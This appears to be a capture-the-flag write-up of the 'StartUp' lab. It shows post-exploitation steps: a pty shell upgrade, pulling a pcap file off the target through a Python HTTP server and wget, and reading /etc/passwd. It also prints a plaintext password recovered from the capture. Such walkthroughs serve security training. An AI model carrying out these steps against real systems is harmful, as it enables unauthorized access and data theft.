StartUp
Suspicious PCAP
- We can catch the Reverse Shell Using
netcat
www-data@startup /$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Enumerating files on the Machine we find a Directory Named:
/incidents
- The Directory Contains a Network Captured File Named:
[suspicious.pcapng]
www-data@startup /$ ls -l incidents/
-rwxr-xr-x 1 www-data www-data 31224 Nov 12 2020 suspicious.pcapng
- We can Transfer the file to our Machine using
Python
on the Target Machine, after that we can either usecurl - wget
to Download the file on our end.
- Target
- Attacker
python3 -m http.server 8888
wget -O "suspicious.pcapng" "http://IP:8888/suspicious.pcapng"
PCAP Analysis
- During the Enumeration we find User - Password: lennie:c4ntg3t3n0ughsp1c3
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:40:21 up 20 min, 1 user, load average: 0.00, 0.03, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
vagrant pts/0 10.0.2.2 17:21 1:09 0.54s 0.54s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -la
total 96
drwxr-xr-x 26 root root 4096 Oct 2 17:24 .
drwxr-xr-x 26 root root 4096 Oct 2 17:24 ..
drwxr-xr-x 2 root root 4096 Sep 25 08:12 bin
drwxr-xr-x 3 root root 4096 Sep 25 08:12 boot
drwxr-xr-x 1 vagrant vagrant 140 Oct 2 17:24 data
drwxr-xr-x 16 root root 3620 Oct 2 17:20 dev
drwxr-xr-x 95 root root 4096 Oct 2 17:24 etc
drwxr-xr-x 4 root root 4096 Oct 2 17:26 home
drwxr-xr-x 2 www-data www-data 4096 Oct 2 17:24 incidents
lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img -> boot/initrd.img-4.4.0-190-generic
lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img.old -> boot/initrd.img-4.4.0-190-generic
drwxr-xr-x 22 root root 4096 Sep 25 08:22 lib
drwxr-xr-x 2 root root 4096 Sep 25 08:10 lib64
drwx------ 2 root root 16384 Sep 25 08:12 lost+found
drwxr-xr-x 2 root root 4096 Sep 25 08:09 media
drwxr-xr-x 2 root root 4096 Sep 25 08:09 mnt
drwxr-xr-x 2 root root 4096 Sep 25 08:09 opt
dr-xr-xr-x 125 root root 0 Oct 2 17:19 proc
-rw-r--r-- 1 www-data www-data 136 Oct 2 17:24 recipe.txt
drwx------ 3 root root 4096 Oct 2 17:24 root
drwxr-xr-x 25 root root 960 Oct 2 17:23 run
drwxr-xr-x 2 root root 4096 Sep 25 08:22 sbin
drwxr-xr-x 2 root root 4096 Oct 2 17:20 snap
drwxr-xr-x 3 root root 4096 Oct 2 17:23 srv
dr-xr-xr-x 13 root root 0 Oct 2 17:19 sys
drwxrwxrwt 7 root root 4096 Oct 2 17:40 tmp
drwxr-xr-x 10 root root 4096 Sep 25 08:09 usr
drwxr-xr-x 1 vagrant vagrant 118 Oct 1 19:49 vagrant
drwxr-xr-x 14 root root 4096 Oct 2 17:23 var
lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz -> boot/vmlinuz-4.4.0-190-generic
lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@startup:/$ cd home
www-data@startup:/home$ cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ sudo -l
[sudo] password for www-data: c4ntg3t3n0ughsp1c3
Sorry, try again
www-data@startup:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false
lennie:x:1002:1002::/home/lennie:
ftpsecure:x:1003:1003::/home/ftpsecure: